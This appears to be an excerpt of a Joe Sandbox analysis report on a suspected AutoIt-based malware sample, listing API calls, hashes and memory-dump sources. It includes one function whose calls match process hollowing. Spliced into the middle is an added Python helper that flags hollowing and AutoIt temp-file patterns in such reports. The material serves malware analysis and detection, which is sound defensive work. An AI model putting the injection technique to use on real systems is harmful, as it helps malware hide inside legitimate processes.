                                                                              • _wcscat.LIBCMT ref: 00932DB5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscat$FileModuleNameOpen
                                                                              • String ID: \$\Include\
                                                                              • API String ID: 3592542968-2640467822
                                                                              • Opcode ID: 83c774532633810c5504902d7aa1652c35cf577e12365c9276ea690b8a85f143
                                                                              • Instruction ID: 3cf93e182fdbcaa5dd01e19a029ff29a1ab2cdbea9f238a58fcc90ca8d680163
                                                                              • Opcode Fuzzy Hash: 83c774532633810c5504902d7aa1652c35cf577e12365c9276ea690b8a85f143
                                                                              • Instruction Fuzzy Hash: FD51807142C3409BC714EF59D9899AAB7F8FF59300B60492EF649C33A1EB70DA48DB52
                                                                              APIs
                                                                              • __getstream.LIBCMT ref: 008E34FE
                                                                                • Part of subcall function 008E7C0E: __getptd_noexit.LIBCMT ref: 008E7C0E
                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 008E3539
                                                                              • __wopenfile.LIBCMT ref: 008E3549
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                              • String ID: <G
                                                                              • API String ID: 1820251861-2138716496
                                                                              • Opcode ID: 956bbdaad1f6d77f9306a63487d6aa0516a395dbb830740cfb4b9216c30586b2
                                                                              • Instruction ID: 438bf7bf56a7f5b3966be92110180d7a59ee38596d5456416814d0b0a9cd7212
                                                                              • Opcode Fuzzy Hash: 956bbdaad1f6d77f9306a63487d6aa0516a395dbb830740cfb4b9216c30586b2
                                                                              • Instruction Fuzzy Hash: F411E771A00286AEDB12BF7B8C4266E36E4FF57354F148425E815DB2C1EB34CE1197A2
                                                                              APIs
                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,008DD28B,SwapMouseButtons,00000004,?), ref: 008DD2BC
                                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,008DD28B,SwapMouseButtons,00000004,?,?,?,?,008DC865), ref: 008DD2DD
                                                                              • RegCloseKey.KERNELBASE(00000000,?,?,008DD28B,SwapMouseButtons,00000004,?,?,?,?,008DC865), ref: 008DD2FF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpenQueryValue
                                                                              • String ID: Control Panel\Mouse
                                                                              • API String ID: 3677997916-824357125
                                                                              • Opcode ID: 64335342782d9ab2a52f7e0860c3470775fe653bf88f5a16c555c0710c355f78
                                                                              • Instruction ID: d947536b1c32946b500af36f98c0aa9641333408d443020a408800c89d879269
                                                                              • Opcode Fuzzy Hash: 64335342782d9ab2a52f7e0860c3470775fe653bf88f5a16c555c0710c355f78
                                                                              • Instruction Fuzzy Hash: FA113979615308BFDB248FA8CC84EAF7BB8FF45744F10456AE805D7210E631AE41AB60
                                                                              APIs
                                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 011B46DB
                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 011B4771
                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 011B4793
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696607130.00000000011B2000.00000040.00000020.00020000.00000000.sdmp, Offset: 011B2000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_11b2000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 2438371351-0
                                                                              • Opcode ID: f7a3111ab7015fd8b62422fe8fc399687c9bf18e9b49b2a513bdf356eeec8a8c
                                                                              • Instruction ID: 157ff8dddf0df4f0e976f7f75036d4bca788c6939de82569fb70f5503231dcf0
                                                                              • Opcode Fuzzy Hash: f7a3111ab7015fd8b62422fe8fc399687c9bf18e9b49b2a513bdf356eeec8a8c
                                                                              • Instruction Fuzzy Hash: 2C621D30A14658DBEB28CFA4C880BDEB776EF58300F1091A9D10DEB791E7759E81CB59
                                                                              APIs
                                                                                • Part of subcall function 008C4517: _fseek.LIBCMT ref: 008C452F
                                                                                • Part of subcall function 0090C56D: _wcscmp.LIBCMT ref: 0090C65D
                                                                                • Part of subcall function 0090C56D: _wcscmp.LIBCMT ref: 0090C670
                                                                              • _free.LIBCMT ref: 0090C4DD
                                                                              • _free.LIBCMT ref: 0090C4E4
                                                                              • _free.LIBCMT ref: 0090C54F
                                                                                • Part of subcall function 008E1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,008E7A85), ref: 008E1CB1
                                                                                • Part of subcall function 008E1C9D: GetLastError.KERNEL32(00000000,?,008E7A85), ref: 008E1CC3
                                                                              • _free.LIBCMT ref: 0090C557
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                              • String ID:
                                                                              • API String ID: 1552873950-0
                                                                              • Opcode ID: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                                                                              • Instruction ID: 2477af1e6cb2ef82712493f02e3e6597ef6a144179454d8dca48a01c8c3ca0ed
                                                                              • Opcode Fuzzy Hash: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                                                                              • Instruction Fuzzy Hash: 13515DB1904219AFDF149F68DC81BADBBB9FF48304F1004AEF219E3291DB715A808F59
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00933725
                                                                              • GetOpenFileNameW.COMDLG32 ref: 0093376F
                                                                                • Part of subcall function 008C660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008C53B1,?,?,008C61FF,?,00000000,00000001,00000000), ref: 008C662F
                                                                                • Part of subcall function 008C40A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008C40C6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Name$Path$FileFullLongOpen_memset
                                                                              • String ID: X
                                                                              • API String ID: 3777226403-3081909835
                                                                              • Opcode ID: 0b63f0d32f75e91724fa5c4b132d43e534a6f715ae6f8de94e592abfd51b662f
                                                                              • Instruction ID: b87247073984da9cc1a7d0e80d56e2b901ea4cb0177ca867622d0d9079d49197
                                                                              • Opcode Fuzzy Hash: 0b63f0d32f75e91724fa5c4b132d43e534a6f715ae6f8de94e592abfd51b662f
                                                                              • Instruction Fuzzy Hash: 87219671A102989BCB11DFD8D845BDE7BF8EF49304F00805AE545E7241DBB49A898F66
                                                                              APIs
                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 0090C72F
                                                                              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0090C746
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Temp$FileNamePath
                                                                              • String ID: aut
                                                                              • API String ID: 3285503233-3010740371
                                                                              • Opcode ID: 73cfd98c801eb009b5d251d05601143a213475197f37dd2c08c929eaf23e5220
                                                                              • Instruction ID: 83db092722b868d04f478b8a4a7b605f90495e4d06439d8a0f0a2da816f2a9b2
                                                                              • Opcode Fuzzy Hash: 73cfd98c801eb009b5d251d05601143a213475197f37dd2c08c929eaf23e5220
                                                                              • Instruction Fuzzy Hash: 59D05E7950030EABDB50ABA0DC0EF8A776C9B00708F0041A0B764A50B1DAF0E6999B55
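Two of the per-function call lists above are the ones an analyst would triage first when reading this report by hand: the function in the non-PE-backed region at 011B2000 that calls CreateProcessW, then Wow64GetThreadContext with flags 00010007 (CONTEXT_FULL for a 32-bit thread), then ReadProcessMemory, which is the skeleton of process hollowing; and the function at 0090C72F that resolves %TEMP% with GetTempPathW and asks GetTempFileNameW for a file with the prefix `aut`, the prefix the AutoIt runtime uses for the aut####.tmp files it drops. The Python below is an added example, not part of the Joe Sandbox report or of its tooling. It parses `APIs` bullet lines in the format shown on this page, groups them per function, and applies two behaviour rules; the rule names, the API sets behind them and the `scan`/`classify` helpers are this example's own assumptions, and the sample input is copied from the entries on this page.

```python
"""Triage helper for Joe Sandbox-style per-function "APIs" listings.

Added example: not part of the report or of Joe Sandbox. The two rules below
(process-hollowing candidate, AutoIt temp-file artifact) are this example's
own labels, not report fields.
"""
import re
from typing import Dict, List, Optional

# One "APIs" bullet:  • Name.MODULE(args), ref: ADDRESS
# LIBCMT entries carry no argument list ("• _memset.LIBCMT ref: 00933725").
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Input copied from the entries on this page (three functions).
SAMPLE_REPORT = """\
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 011B46DB
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 011B4771
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 011B4793
Memory Dump Source
APIs
• GetTempPathW.KERNEL32(00000104,?), ref: 0090C72F
• GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0090C746
Strings
APIs
• RegOpenKeyExW.KERNELBASE(80000001,Control Panel\\Mouse,00000000,00000001), ref: 008DD2BC
• RegCloseKey.KERNELBASE(00000000), ref: 008DD2FF
Strings
"""

# API sets behind the hollowing rule (assumption of this example).
CREATE_PROCESS = {"CreateProcessW", "CreateProcessA", "CreateProcessInternalW"}
THREAD_CONTEXT = {"GetThreadContext", "Wow64GetThreadContext",
                  "SetThreadContext", "Wow64SetThreadContext"}
REMOTE_MEMORY = {"ReadProcessMemory", "WriteProcessMemory",
                 "VirtualAllocEx", "NtUnmapViewOfSection"}


def parse_functions(report: str) -> List[List[Dict[str, str]]]:
    """Return one list of calls per "APIs" heading; any other heading closes it."""
    functions: List[List[Dict[str, str]]] = []
    current: Optional[List[Dict[str, str]]] = None
    for line in report.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = []
            functions.append(current)
            continue
        match = API_LINE.match(line)
        if match is not None and current is not None:
            # Missing argument list (LIBCMT entries) becomes an empty string.
            current.append({k: v or "" for k, v in match.groupdict().items()})
        elif stripped:
            current = None
    return functions


def classify(calls: List[Dict[str, str]]) -> List[str]:
    """Apply the two rules to one function's calls and return the tags hit."""
    present = {c["name"] for c in calls}
    tags: List[str] = []
    # Spawn a child, touch its memory, steer a thread context: the three
    # ingredients of process hollowing in one function body.
    if present & CREATE_PROCESS and present & THREAD_CONTEXT and present & REMOTE_MEMORY:
        tags.append("process-hollowing-candidate")
    # GetTempFileName(prefix="aut") is how the AutoIt runtime names the
    # aut####.tmp files it drops in %TEMP%; the prefix is the second argument.
    for c in calls:
        if (c["name"] in {"GetTempFileNameW", "GetTempFileNameA"}
                and c["args"].split(",")[1:2] == ["aut"]):
            tags.append("autoit-temp-file")
    return tags


def scan(report: str) -> Dict[str, List[str]]:
    """Map each flagged function (keyed by its first call's ref) to its tags."""
    findings: Dict[str, List[str]] = {}
    for calls in parse_functions(report):
        if calls:
            tags = classify(calls)
            if tags:
                findings[calls[0]["ref"]] = tags
    return findings


if __name__ == "__main__":
    for ref, tags in scan(SAMPLE_REPORT).items():
        print(ref, ", ".join(tags))
```

Run against the sample, `scan` flags the 011B46DB function as a hollowing candidate and the 0090C72F function as an AutoIt temp-file artifact, and leaves the registry-reading function untagged. The hollowing rule deliberately requires all three ingredients inside one function body, so a stray ReadProcessMemory in a debugger-check routine does not fire it; widen the sets or add an ordering check if the reports you feed it split the sequence across subcalls.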
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e0a2f2256c6dc67787c5c63905a75c598b8e0a06bc6bddcf69563ae50803a455
                                                                              • Instruction ID: 7744262358b22a328ad04e4f48aa7d4d71be4dd85999b78e40936eb4aec16adb
                                                                              • Opcode Fuzzy Hash: e0a2f2256c6dc67787c5c63905a75c598b8e0a06bc6bddcf69563ae50803a455
                                                                              • Instruction Fuzzy Hash: 7EF17B716083099FC710DF28C891B6AB7E5FF88314F10892EF9999B392D734E945CB82
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 008C5022
                                                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 008C50CB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: IconNotifyShell__memset
                                                                              • String ID:
                                                                              • API String ID: 928536360-0
                                                                              • Opcode ID: 3a885dfdae8d81a4013a56f259f41d09a08eb2bd28b3927e5115a2bc47c55dfa
                                                                              • Instruction ID: c42083c2b2944e2b1cf461e96df45b6aa7febb2693d113d27a7375b9e3f41880
                                                                              • Opcode Fuzzy Hash: 3a885dfdae8d81a4013a56f259f41d09a08eb2bd28b3927e5115a2bc47c55dfa
                                                                              • Instruction Fuzzy Hash: A0314CB1509B01CFD721DF24D885B9BBBF8FB49308F00092EE59AC6251E771A985CB96
                                                                              APIs
                                                                              • __FF_MSGBANNER.LIBCMT ref: 008E3973
                                                                                • Part of subcall function 008E81C2: __NMSG_WRITE.LIBCMT ref: 008E81E9
                                                                                • Part of subcall function 008E81C2: __NMSG_WRITE.LIBCMT ref: 008E81F3
                                                                              • __NMSG_WRITE.LIBCMT ref: 008E397A
                                                                                • Part of subcall function 008E821F: GetModuleFileNameW.KERNEL32(00000000,00980312,00000104,00000000,00000001,00000000), ref: 008E82B1
                                                                                • Part of subcall function 008E821F: ___crtMessageBoxW.LIBCMT ref: 008E835F
                                                                                • Part of subcall function 008E1145: ___crtCorExitProcess.LIBCMT ref: 008E114B
                                                                                • Part of subcall function 008E1145: ExitProcess.KERNEL32 ref: 008E1154
                                                                                • Part of subcall function 008E7C0E: __getptd_noexit.LIBCMT ref: 008E7C0E
                                                                              • RtlAllocateHeap.NTDLL(00FA0000,00000000,00000001,00000001,00000000,?,?,008DF507,?,0000000E), ref: 008E399F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                              • String ID:
                                                                              • API String ID: 1372826849-0
                                                                              • Opcode ID: 3784d7980bd02219abeb2c751ca26432c0e4f0cba1d782e049381d524d3fdee0
                                                                              • Instruction ID: f441c4d6594ad5ea3a7976a1ba2592e2ce4e3c6ce9bea72f8d4b277be13108b7
                                                                              • Opcode Fuzzy Hash: 3784d7980bd02219abeb2c751ca26432c0e4f0cba1d782e049381d524d3fdee0
                                                                              • Instruction Fuzzy Hash: 6401B936349281AAE6153B2BDC4AB2E3798FB83764F210029F505DB283DFB19D0046A5
                                                                              APIs
                                                                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0090C385,?,?,?,?,?,00000004), ref: 0090C6F2
                                                                              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0090C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0090C708
                                                                              • CloseHandle.KERNEL32(00000000,?,0090C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0090C70F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: File$CloseCreateHandleTime
                                                                              • String ID:
                                                                              • API String ID: 3397143404-0
                                                                              • Opcode ID: 2e45fcdc77c34861bbb4119a7b854e4b19ac6d8cd6b5908f7f7a9348d08d74a8
                                                                              • Instruction ID: 429e1e3d7c6eb5c8c969c893142d6d77a9a437ac38b5ee1bd0b138e57790d0ff
                                                                              • Opcode Fuzzy Hash: 2e45fcdc77c34861bbb4119a7b854e4b19ac6d8cd6b5908f7f7a9348d08d74a8
                                                                              • Instruction Fuzzy Hash: 5EE0863A146214BBD7211F54AC09FCE7B18AB0AB64F104210FF14690E097B125119798
                                                                              APIs
                                                                              • _free.LIBCMT ref: 0090BB72
                                                                                • Part of subcall function 008E1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,008E7A85), ref: 008E1CB1
                                                                                • Part of subcall function 008E1C9D: GetLastError.KERNEL32(00000000,?,008E7A85), ref: 008E1CC3
                                                                              • _free.LIBCMT ref: 0090BB83
                                                                              • _free.LIBCMT ref: 0090BB95
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 776569668-0
                                                                              • Opcode ID: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
                                                                              • Instruction ID: ac84544b6a5f00c6f2fd523611b0958038b4259029f23d9b903357247a253c66
                                                                              • Opcode Fuzzy Hash: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
                                                                              • Instruction Fuzzy Hash: E0E012B26417818BDE24657E6E4CEB323CC9F05355724081DB459E7186CF34E84085A4
                                                                              APIs
                                                                                • Part of subcall function 008C22A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,008C24F1), ref: 008C2303
                                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 008C25A1
                                                                              • CoInitialize.OLE32(00000000), ref: 008C2618
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0093503A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                              • String ID:
                                                                              • API String ID: 3815369404-0
                                                                              APIs
                                                                              • _strcat.LIBCMT ref: 009208FD
                                                                                • Part of subcall function 008C936C: __swprintf.LIBCMT ref: 008C93AB
                                                                                • Part of subcall function 008C936C: __itow.LIBCMT ref: 008C93DF
                                                                              • _wcscpy.LIBCMT ref: 0092098C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __itow__swprintf_strcat_wcscpy
                                                                              • String ID:
                                                                              • API String ID: 1012013722-0
                                                                              APIs
                                                                              • IsThemeActive.UXTHEME ref: 008C3A73
                                                                                • Part of subcall function 008E1405: __lock.LIBCMT ref: 008E140B
                                                                                • Part of subcall function 008C3ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 008C3AF3
                                                                                • Part of subcall function 008C3ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 008C3B08
                                                                                • Part of subcall function 008C3D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,008C3AA3,?), ref: 008C3D45
                                                                                • Part of subcall function 008C3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,008C3AA3,?), ref: 008C3D57
                                                                                • Part of subcall function 008C3D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00981148,00981130,?,?,?,?,008C3AA3,?), ref: 008C3DC8
                                                                                • Part of subcall function 008C3D19: SetCurrentDirectoryW.KERNEL32(?,?,?,008C3AA3,?), ref: 008C3E48
                                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 008C3AB3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
